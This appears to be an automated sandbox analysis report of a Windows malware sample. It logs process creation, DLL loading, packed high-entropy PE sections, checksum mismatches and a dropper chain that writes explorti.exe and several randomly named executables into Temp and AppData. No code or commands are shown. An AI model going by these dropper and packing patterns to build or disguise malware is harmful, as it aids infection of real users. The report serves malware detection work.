Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2092,i,10167336133317156012,1155906441156818278,262144 --disable-features=TranslateUI /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7172 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7216 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3244 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=2128 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3576 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:8

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1897472 > 1048576

Source: file.exe

Static PE information: Raw size of mtwfurbd is bigger than: 0x100000 < 0x19da00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 3.2.explorti.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 4.2.explorti.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mtwfurbd:EW;tfjhxtwu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Unpacked PE file: 5.2.44affe150c.exe.c90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Unpacked PE file: 6.2.4bea71e542.exe.a80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW;

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Code function: 8_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_007D42DE

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.4.dr	Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: 4bea71e542.exe.4.dr	Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: 44affe150c.exe.4.dr	Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d9ba5 should be: 0x1da7a0
Source: file.exe	Static PE information: real checksum: 0x1d9ba5 should be: 0x1da7a0

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: mtwfurbd
Source: file.exe	Static PE information: section name: tfjhxtwu
Source: file.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: mtwfurbd
Source: explorti.exe.0.dr	Static PE information: section name: tfjhxtwu
Source: explorti.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.4.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name: .rsrc
Source: random[1].exe.4.dr	Static PE information: section name: .idata
Source: random[1].exe.4.dr	Static PE information: section name:
Source: random[1].exe.4.dr	Static PE information: section name: ylafldxq
Source: random[1].exe.4.dr	Static PE information: section name: tgmwlthu
Source: random[1].exe.4.dr	Static PE information: section name: .taggant
Source: 44affe150c.exe.4.dr	Static PE information: section name:
Source: 44affe150c.exe.4.dr	Static PE information: section name: .rsrc
Source: 44affe150c.exe.4.dr	Static PE information: section name: .idata
Source: 44affe150c.exe.4.dr	Static PE information: section name:
Source: 44affe150c.exe.4.dr	Static PE information: section name: ylafldxq
Source: 44affe150c.exe.4.dr	Static PE information: section name: tgmwlthu
Source: 44affe150c.exe.4.dr	Static PE information: section name: .taggant
Source: 4bea71e542.exe.4.dr	Static PE information: section name:
Source: 4bea71e542.exe.4.dr	Static PE information: section name: .rsrc
Source: 4bea71e542.exe.4.dr	Static PE information: section name: .idata
Source: 4bea71e542.exe.4.dr	Static PE information: section name:
Source: 4bea71e542.exe.4.dr	Static PE information: section name: ylafldxq
Source: 4bea71e542.exe.4.dr	Static PE information: section name: tgmwlthu
Source: 4bea71e542.exe.4.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 4_2_0014D84C push ecx; ret		4_2_0014D85F
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007F0A76 push ecx; ret		8_2_007F0A89

Source: file.exe	Static PE information: section name: entropy: 7.978686534287973
Source: file.exe	Static PE information: section name: mtwfurbd entropy: 7.953301847590159
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.978686534287973
Source: explorti.exe.0.dr	Static PE information: section name: mtwfurbd entropy: 7.953301847590159
Source: random[1].exe.4.dr	Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: 44affe150c.exe.4.dr	Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: 4bea71e542.exe.4.dr	Static PE information: section name: ylafldxq entropy: 7.952660090693873

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Jump to dropped file
